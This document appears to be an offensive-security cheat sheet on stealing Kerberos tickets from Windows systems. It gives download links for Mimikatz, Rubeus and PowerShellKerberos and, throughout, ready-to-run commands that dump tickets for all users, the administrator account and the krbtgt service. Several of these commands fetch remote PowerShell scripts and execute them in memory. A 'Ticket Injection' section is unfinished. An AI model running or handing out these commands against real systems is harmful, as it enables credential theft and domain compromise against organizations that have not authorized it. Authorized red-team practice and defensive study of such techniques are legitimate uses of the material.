Ticket Aquisition

Requirements

Unprivileged

Can extract Kerberos tickets for the current user context

Privileged (Elevated)

Can extract all Kerberos tickets on the given system

Tools

Mimikatz
- Binary: https://github.com/gentilkiwi/mimikatz/releases
- PowerShell: https://github.com/BC-SECURITY/Empire/blob/main/empire/test/data/module_source/credentials/Invoke-Mimikatz.ps1
Rubeus:
- Binary: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
- PowerShell: https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Rubeus.ps1
PowerShellKerberos:
- PowerShell: https://github.com/MzHmO/PowershellKerberos/blob/main/dumper.ps1

Tool Usage

Mimikatz

# Export to file methods

# Export tickets (Preferred Method (More Accurate))
Mimikatz.exe "token::elevate" "sekurlsa::tickets /export"

# Alternative Method
Mimikatz.exe "token::elevate" "kerberos::list /export"

# Export to Base64 without touching disk
Mimikatz.exe "token::elevate" "standard::base64 /out:true" "sekurlsa::tickets /export"

# Load into memory
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/test/data/module_source/credentials/Invoke-Mimikatz.ps1')

# Export to file methods

# Export tickets (Preferred Method (More Accurate))
Invoke-Mimikatz -Command '"token::elevate "sekurlsa::tickets /export"'

# Alternative Method
Invoke-Mimikatz -Command '""token::elevate" "kerberos::list /export"'

# Export to Base64 without touching disk
Invoke-Mimikatz -Command '"token::elevate" "standard::base64 /out:true" "sekurlsa::tickets /export"'

Rubeus

# Dump All
.\Rubeus.exe dump /nowrap

# Dump Specified tickets that match a service
.\Rubeus.exe dump /service:krbtgt /nowrap
.\Rubeus.exe dump /service:HTTP /nowrap

# Dump tickets for specified users
.\Rubeus.exe dump /user:administrator /nowrap

# Both
.\Rubeus.exe dump /service:krbtgt /user:administrator /nowrap

# Load into memory
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')

# Dump All
Invoke-Rubeus -Command "dump /nowrap"

# Dump Specified tickets that match a service
Invoke-Rubeus -Command "dump /service:krbtgt /nowrap"
Invoke-Rubeus -Command "dump /service:HTTP /nowrap"

# Dump tickets for specified users
Invoke-Rubeus -Command "dump /user:administrator /nowrap"

# Both
Invoke-Rubeus -Command "dump /service:krbtgt /user:administrator /nowrap"

PowerShellKerberos

# Load into memory and dump
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/main/dumper.ps1')

Ticket Injection

WIP

Last updated 2 years ago